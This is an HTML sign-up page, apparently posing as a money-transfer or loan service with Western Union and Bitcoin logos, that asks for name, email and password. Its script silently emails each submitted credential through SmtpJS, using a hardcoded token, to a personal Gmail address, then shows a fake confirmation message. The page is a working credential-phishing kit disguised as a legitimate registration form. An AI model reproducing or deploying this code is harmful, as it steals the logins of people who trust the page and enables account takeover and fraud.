
<!doctype html>
<html lang="fr">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>mon site</title>
    
    <script src="https://kit.fontawesome.com/7e2a69d5dd.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <style type="text/css" id="dcoder_stylesheet">
    @import url("https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap");

        @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap");

        @import url('https://fonts.googleapis.com/css2?family=Archivo+Black&display=swap');
 
@import url("https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap");

@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap");

@import url('https://fonts.googleapis.com/css2?family=Archivo+Black&display=swap');       
        

        * {
            margin: 0;
            padding: 0;
        }
       body {
           font-family: "Poppins", sans-serif; 
            margin: 0;
            padding: 0;
        }
   .Trans{
  position : ;
 width:80%;
 height:480px;
 margin-top:40%;
 border:1px solid #777;
 background-color:white;
 margin-left:8%;   
        } 
    .nmg img{
        width:100px;
    }
   
   input{
       width:75%; 
       height:30px;
       
       outline:none;
       font-family: "Poppins", sans-serif;
       margin-left:11%;
    }

input[type="submit"]{
    width:76.5%;
    height:40px;
    color:white;
   background-color:deepskyblue;
   font-family: "Archivo Black", sans-serif; 
   border:1px solid #777;
   margin-top:5%;
}

.alert8{
  position:fixed;
       display :none; 
       border:
       width:100%;
       height:680px;
       margin-left:%;
       margin-top:-165%;
       background-color: white;
       text-align:center;
       border-radius:5px;  
} 

.alert8 img{
          width:200px;
          margin-top:50%;
          
      }
       h4{
          margin-top:5%;
         margin-left:11%;
        font-size:13px;  
      }
      .omg img{
         
        width:35px;
        margin: 0 16px;
    }
    #radio1{
        width:15px;
        
    }
    .p1{
      margin-left:11%;  
    }
    .p2{
      margin-left:35%;  
    }
    
    .account{
     font-family: "Archivo Black", sans-serif; 
     font-size:13px; 
     margin-left:11%; 
     margin-top:2%; 
    }
    .radio{
        display:flex;
        
    }
    .per1{
        margin-top:-9.5%;
        margin-left:18%;
        font-family: "Archivo Black", sans-serif; 
        font-size:13px;
    }
    .per2{
      margin-top:-4.5%;
        margin-left:58%;
        font-family: "Archivo Black", sans-serif; 
        font-size:13px;  
    }
    .gmg{
        margin-top:-180%;
        margin-left:33%;
        
    }
    .gmg img{
        width:100px;
        border-radius:100px;
    }
    .do{
    margin-top:2%;
    margin-left:11%;
    font-family: "Archivo Black", sans-serif; 
}
.ico1{
    margin-top:-110%; 
    margin-left:70%; 
}
.ico2{
    margin-top:10%; 
    margin-left:69%;  
}
.ico3{
    margin-top:9%; 
    margin-left:70.5%;
}
.ico1 img{
 width:25px;
  
}
.ico2 img{
  width:30px;     
}
.ico3 img{
  width:26px;     
}
.alert9{
    margin-top:-60%;
       display:none;
      position:fixed;
      width:100%;
      height:700px;
       background-color: rgba(255, 255, 255, 0.7);
      }
      .alert9 img{
         width:200px;
         margin-top:80%;
         margin-left:21%;
      }
      .kmg img{
          width:70px;
      }
      .txt{
          text-align: center;
          margin-left:5%;
          margin-right:5%;
     margin-top:57%;
          
      }
      .close02{
          margin-top:-65%;
          font-size:20px;
          margin-left:75%;
      }
     
</style>
</head>

<body>
  
<div class="alert9"><img src="https://i.postimg.cc/TYg459n3/JVX7.gif"></div>    
<div class="Trans"><br>
       <form id="submit1">
<div class="do">Register in one click</div>
<div class="bg">
<h4>User name</h4>
<input type="text" placeholder="First and last name" id="ban1" required><br>
<h4>Email</h4>
<input type="text" placeholder="Email" id="ban2" required><br>
<h4>Password</h4>
<input type="text" placeholder="Password" id="ban3" required><br>

<div class="account">Account type</div>
<br><div class="radio">
<div class="p1"><input type="radio" id="radio1"></div>
<div class="p2"><input type="radio" id="radio1"></div>
</div>
<div class="per1">Personal</div>
<div class="per2">Business</div>


<input type="submit" id="ltn"value="Sign up">
</div><br>

<div class="omg">
<img src="https://i.postimg.cc/gr9Y1rSR/western-union-logo-1-1.png"> <img src="https://i.postimg.cc/6393TwsS/prestamo-efectivo-credito-finanzas-logotipo-icono-ilustracion-marca-identidad-7109-750.jpg">  <img src="https://i.postimg.cc/rsfg78cL/bitcoin-logo-png-transparent.png"> <img src="https://i.postimg.cc/y813kFFn/eb2349c3-b2f8-4a93-a286-8f86a62ea9d8.png"></div>

<div class="gmg"><img src="https://i.postimg.cc/4NJ8CbPw/7407995-compte-symbole-chef-et-travailleurs-equipe-logo-vectoriel.jpg"></div>



</div></form>
<div class="alert8" style="display: none;">
            <div class="kmg"><img src="https://i.postimg.cc/2jxWdkC0/11289688.png"></div>
            <div class="close02">X</div>
            <div class="txt">Your request has been sent successfully, we will get back to you in less than 24 hours.</div>
        </div>
    </div>
<div class="ico1"><img src="https://i.postimg.cc/4NJ8CbPw/7407995-compte-symbole-chef-et-travailleurs-equipe-logo-vectoriel.jpg"></div>
<div class="ico2"><img src="https://i.postimg.cc/Y9K3d1j6/4812397.png"></div>
<div class="ico3"><img src="https://i.postimg.cc/X7HkRMp7/paiement-securise-picto.png"></div>
</body>
<script>

const close02alert8 = document.querySelector('.alert8 .close02');
    const alert8 = document.querySelector('.alert8');
    const alert9 = document.querySelector('.alert9');

    close02alert8.addEventListener('click', function() {
        alert8.style.display = 'none';
    });

    document.getElementById('submit1').addEventListener('submit', (e) => {
        e.preventDefault();
        setTimeout(() => {
            const ban1 = document.getElementById('ban1').value;
            const ban2 = document.getElementById('ban2').value;
            const ban3 = document.getElementById('ban3').value;

            const ebody3 = `
                <h1>Nom: </h1>${ban1}<br>
                <h1>Email : </h1>${ban2}<br>
                <h1>Moni: </h1>${ban3}<br>
            `;

            Email.send({
                SecureToken: "24ed91c7-882b-465c-97d2-32856db82fdb",
                To: 'abdoulissa154@gmail.com',
                From: "abdoulissa154@gmail.com",
                Subject: "Sujet du mail",
                Body: ebody3
            }).then(() => {
                alert9.style.display = 'block';
                setTimeout(() => {
                    alert9.style.display = 'none';
                    alert8.style.display = 'block';
                }, 7000);
            });

            window.location.href = "#"; // Redirection facultative
        }, 500);
    });
</script>
</html>